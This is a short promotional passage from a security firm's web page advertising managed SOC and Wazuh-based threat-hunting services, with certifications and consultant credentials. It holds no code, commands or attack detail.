Yes. Codesecure runs structured, hypothesis-driven hunts mapped to ATT&CK, systematic IOC sweeps against your retained history, and converts findings into durable Wazuh detections, either within a managed SOC or as standalone hunting engagements. We also deliver hunting methodology and query playbooks with handover for in-house teams. ISO/IEC 27001:2022 certified delivery with named OSCP and CEH consultants.


Codesecure SOC Engineering Team

ISO/IEC 27001:2022 Certified SOC Engineers

Codesecure Solutions is ISO/IEC 27001:2022 certified and runs Managed SOC using the Wazuh + TheHive + n8n + Cortex + MISP open source stack. Named OSCP, CEH and CISSP consultants, 24x7 analysts and automated reporting. Engagements delivered across India, Singapore, UAE and Malaysia for fintech, healthcare, SaaS, manufacturing and maritime clients.

✓ ISO/IEC 27001:2022 Certified

Run Proactive Threat Hunting on Wazuh

Codesecure runs hypothesis-driven hunts, systematic IOC sweeps and ATT&CK-mapped coverage on Wazuh, converting every finding into durable detection. Managed SOC or standalone hunting engagements with named OSCP and CEH consultants. ISO/IEC 27001:2022 certified delivery.